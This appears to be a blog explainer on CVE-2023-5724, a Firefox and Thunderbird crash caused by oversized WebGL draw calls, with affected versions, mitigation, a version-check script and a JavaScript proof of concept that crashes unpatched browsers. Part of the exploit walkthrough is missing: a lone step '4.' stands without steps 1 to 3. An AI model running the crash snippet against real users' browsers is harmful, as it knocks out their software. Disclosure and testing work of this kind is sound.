On October 24, 2023, a notable vulnerability was disclosed in Mozilla Firefox, Firefox ESR, and Thunderbird, tracked as CVE-2023-5724. In simple terms, this bug allows attackers to crash your browser — sometimes even leading to security compromise — by issuing extremely large graphical draw calls. Let’s break down what’s going on, why it matters, and how you might test for or exploit this issue if you’re a security researcher.

What Are Draw Calls, and Why Do They Matter?

A “draw call” in graphics programming means telling the graphics driver to draw something — like a shape or a web page element. Modern websites can ask your computer to do a lot of drawing very quickly, especially using Canvas or WebGL in Firefox and Thunderbird’s rendering engine.

Most drivers (the software that controls your hardware) expect reasonable numbers for draw call size. But sometimes, if you ask to draw something absurdly large, the browser or the hardware driver may not be able to handle it gracefully, leading to memory corruption or a crash.

Affected Versions

- Firefox below 119
- Thunderbird below 115.4.1

> Note: If your software is up-to-date, you are not vulnerable.

The Simple Problem: Drivers are Not Always Robust

The issue is simple: The graphics processing drivers that Mozilla relies on weren’t properly handling the edge case of “extremely large” draw calls. Instead of safely failing or rejecting the request, they could crash — possibly in ways that attackers could exploit.

From Mozilla’s own advisory:
> *"Drivers are not always robust to extremely large draw calls, and in some cases this scenario could have led to a crash."*

Code Snippet: Triggering the Vulnerability

You don’t need a super-complex exploit for this one. If you want to see how this could be triggered, here’s some sample JavaScript for use in a Firefox browser (do not use this on machines with valuable data):

```javascript
// Attempt to allocate a massive WebGL buffer and draw
const canvas = document.createElement("canvas");
canvas.width = 10000;
canvas.height = 10000;
document.body.appendChild(canvas);

const gl = canvas.getContext("webgl");
if (gl) {
    const buffer = gl.createBuffer();
    gl.bindBuffer(gl.ARRAY_BUFFER, buffer);
    // Try to allocate a huge buffer, may trigger driver crash
    try {
        gl.bufferData(gl.ARRAY_BUFFER, new Float32Array(2 ** 27), gl.STATIC_DRAW);
        // Issue an oversized draw call starting at vertex 0
        gl.drawArrays(gl.TRIANGLES, 0, 2 ** 26);
    } catch (e) {
        alert("Exception: " + e);
    }
}
```

Depending on your driver and machine, this may crash the browser. In older versions, this sometimes resulted in corrupted memory or a full application crash.

Exploit Details

While “just crashing” a browser doesn’t sound too bad, a malformed draw call that crashes the driver can sometimes be escalated further:

- Remote code execution: If memory gets corrupted in a clever way, an attacker could run arbitrary code.
- Security sandbox escape: Sometimes, bugs like these can let processes escape visual sandboxing.

> *Note: As of public disclosure, no known RCE exploits exist in the wild for this specific bug, but history teaches us to patch these quickly!*

The graphics driver (if unpatched) fails to handle the request, causing the process to crash.

4. With enough research, a skilled attacker could potentially craft a payload for code execution instead of just a crash.

Testing for the Vulnerability

A simple test is to load the above code snippet on an unpatched version of Firefox (pre-119) or Thunderbird (pre-115.4.1, with HTML email rendering enabled). If the browser freezes, crashes, or behaves unpredictably, you’re vulnerable!
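A safer check than loading the crash snippet is to compare the product version a client reports against the fixed releases named above. The following is an added example, not code from the article or from Mozilla; it assumes the fix versions Firefox 119 and Thunderbird 115.4.1 cited on this page and classifies constructed User-Agent strings (Firefox ESR is left out because the page gives no ESR fix version).

```javascript
// Added example: triage Gecko User-Agent strings against the fixed
// versions this article cites for CVE-2023-5724. Not Mozilla's code.
const FIXED_VERSIONS = {
  Firefox: [119, 0, 0],      // fixed in Firefox 119 (per the article)
  Thunderbird: [115, 4, 1],  // fixed in Thunderbird 115.4.1 (per the article)
};

// Constructed sample UA strings, not captured from real clients.
const SAMPLE_USER_AGENTS = [
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
  "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0",
  "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Thunderbird/115.4.0",
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/537.36 Chrome/118.0.0.0 Safari/537.36",
];

// Extract "Firefox/119.0" or "Thunderbird/115.4.1" from a UA string.
// Returns { product, version: [major, minor, patch] } or null.
function parseGeckoProduct(ua) {
  const m = /\b(Firefox|Thunderbird)\/(\d+(?:\.\d+){0,2})/.exec(ua);
  if (!m) return null;
  const parts = m[2].split(".").map(Number);
  while (parts.length < 3) parts.push(0); // "118.0" -> [118, 0, 0]
  return { product: m[1], version: parts };
}

// Lexicographic comparison of two [major, minor, patch] tuples.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// "vulnerable", "patched", or "unknown" (not a Firefox/Thunderbird UA).
function classifyUserAgent(ua) {
  const parsed = parseGeckoProduct(ua);
  if (!parsed) return "unknown";
  const fixed = FIXED_VERSIONS[parsed.product];
  return compareVersions(parsed.version, fixed) < 0 ? "vulnerable" : "patched";
}

for (const ua of SAMPLE_USER_AGENTS) {
  console.log(classifyUserAgent(ua), "<-", ua);
}
```

Firefox ESR 115 reports itself as Firefox/115.0 in its User-Agent regardless of point release, so an updated ESR build would be flagged as vulnerable here; treat the result as a triage hint and confirm the installed build from about:support or your package manager.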

Official References & Further Reading

- NIST NVD: CVE-2023-5724
- Mozilla Security Advisory MFSA2023-44
- Mozilla Bugzilla ID 1851467

Mitigation

- Update Firefox, Firefox ESR, and Thunderbird to the latest versions.
- Disable WebGL if you don’t need it. You can do this in Firefox about:config by setting webgl.disabled = true.

Conclusion

CVE-2023-5724 demonstrates how even simple mistakes — like not checking numbers for graphical draw calls — can give attackers an entry point. Make sure your browsers and mail apps are updated, and stay safe browsing out there!


Timeline

Published on: 10/25/2023 18:17:44 UTC
Last modified on: 11/02/2023 20:17:36 UTC